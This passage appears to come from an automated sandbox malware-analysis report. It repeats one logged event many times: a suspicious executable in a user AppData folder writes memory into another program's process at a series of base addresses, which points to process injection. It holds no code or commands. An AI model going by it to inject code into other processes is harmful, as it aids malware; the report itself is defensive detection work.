                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29B1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29B178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29B1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29B1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B20000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B61778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B6178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B61BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B61BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 27E0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2821778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 282178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2821BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2821BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2210000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2251778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 225178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2251BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2251BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2880000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 28C1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 28C178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 28C1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 28C1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11E0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1221778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 122178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1221BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1221BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DA0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DE1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DE178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DE1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DE1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26D0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2711778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 271178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2711BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2711BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2580000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25C1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25C178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25C1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25C1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C40000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C81778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C8178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C81BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C81BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25B0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25F1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25F178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25F1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25F1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F10000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F51778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F5178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F51BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F51BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 700000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 741778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 74178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 741BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 741BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C70000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CB1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CB178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CB1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CB1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2610000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2651778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 265178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2651BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2651BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 6D0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 711778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 71178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 711BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 711BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1130000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1171778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 117178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1171BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1171BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 9D0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: A11778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: A1178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: A11BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: A11BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: B90000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: BD1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: BD178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: BD1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: BD1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25E0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2621778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 262178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2621BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2621BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C10000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C51778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C5178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C51BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C51BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D178CJump to behavior
